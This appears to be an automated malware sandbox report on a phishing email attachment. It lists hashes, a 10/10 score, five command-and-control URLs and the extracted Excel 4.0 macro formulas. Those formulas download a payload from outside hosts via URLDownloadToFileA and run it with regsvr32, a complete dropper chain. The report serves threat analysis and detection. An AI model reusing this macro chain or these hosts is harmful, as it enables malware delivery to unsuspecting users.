Farmers Union Oil Company of Kenmare[.]eml

General

Target

Farmers Union Oil Company of Kenmare.eml
Size

124KB
MD5

e6110fb4d0f798cf4ee231dd7c728ae4
SHA1

f5ad97d8d32eefdb698a075f66e125b5ffde22f3
SHA256

bc6bddac3c9c2ab3ea05264cffbe20a845b11d4e142f178ce3fdcb8bbedf2d9d
SHA512

3fa56e42a04519eb241ccb4cd7635604a0cbfd033d9392077aab875f64d45d06bd82cc16523ea99cc3e408fac728641afbca4b622c6903faf509bece69fbaae7
SSDEEP

3072:s38JIAuQhE3hlXcE2TQsU9lU1OGUCARBn/yQ:Q8eAuQhEfXcECQZ/pG7ARBn/yQ

Score

10^/10

macro xlm

Rule

Excel 4.0 XLM Macro

C2

http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/

http://www.beholdpublications.com/home/BABxyyWZx8Vu/

http://explorationit.com/screwing/AxLm/

http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/

http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/

Attributes

formulas
=FORMULA() =CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.ajaxmatters.com/c7g8t/zbBYgukXYxzAF2hZc/","..\xxw1.ocx",0,0) =IF('EGFAGAGDGE'!D15<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://www.beholdpublications.com/home/BABxyyWZx8Vu/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D17<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://explorationit.com/screwing/AxLm/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D19<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://donboscoschoolputhuppally.org/wp-content/UuQ7LBsPoGu9Q/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D21<0,CALL("urlmon","URLDownloadToFileA","JJCCBB",0,"http://myclassroomtime.com/mongery/ZlPsROtQiXIujmJmAA/","..\xxw1.ocx",0,0)) =IF('EGFAGAGDGE'!D23<0,CLOSE(0),) =EXEC("C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx") =RETURN()

Suspicious Office macro 1 IoCs

Office document equipped with 4.0 macros.

resource	yara_rule
static1/unpack001/kenmarefarmersunion.com.xlsm	office_xlm_macros